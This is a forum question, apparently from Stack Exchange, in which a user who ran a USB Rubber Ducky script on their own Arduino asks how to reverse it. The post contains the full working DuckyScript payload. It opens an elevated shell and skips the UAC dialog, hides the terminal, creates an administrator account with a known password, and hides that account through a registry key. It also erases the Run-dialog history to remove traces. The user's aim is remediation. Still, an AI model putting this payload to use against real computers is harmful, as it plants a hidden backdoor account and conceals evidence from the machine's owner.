0

So I thought it would be fun to turn my Arduino Pro Micro into a bad usb rubber ducky. Wrong, It is not so fun. Stupid me ran this code that created an administrative user and hid it from other accounts. I am in way over my head and also am a complete idiot. The script can be found here:https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Windows-10:-Add-admin-account

REM Start delay
DELAY 1000
DELAY 300
GUI r
DELAY 300

STRING powershell Start-Process cmd -Verb runAs
DELAY 300
ENTER

DELAY 2000
REM bypassing security dialog
ALT y
DELAY 500
REM obfuscationg terminal
STRING mode con:cols=18 lines=1
DELAY 300
ENTER
REM changing color
STRING color 78
DELAY 300
ENTER
REM adding user usename = ADMIN password is admin 
STRING net user /add ADMIN admin
DELAY 300
ENTER
REM Adding user in administrators group
STRING net localgroup administrators ADMIN /add
DELAY 300
ENTER
REM Hiding the user via editing registory
STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
DELAY 300
ENTER

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ADMIN /t REG_DWORD /d 0
DELAY 300
ENTER

REM removing the footprints.
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
DELAY 300
ENTER
REM Safe exiting
STRING exit
DELAY 300
ENTER

If anyone knows how to reverse this that would be real nice. Sorry for wasting anyones time.

Alex z
  • 33
  • 8
  • Wrong forum @Alex R, but well you can also ask here, Did you try to refresh your computer? – Francis G May 08 '19 at 03:28
  • I think i solved it. I already had an account named admin so it didnt create a new account. I also changed the certificate value to 1 to show all accounts – Alex z May 08 '19 at 03:37

0 Answers0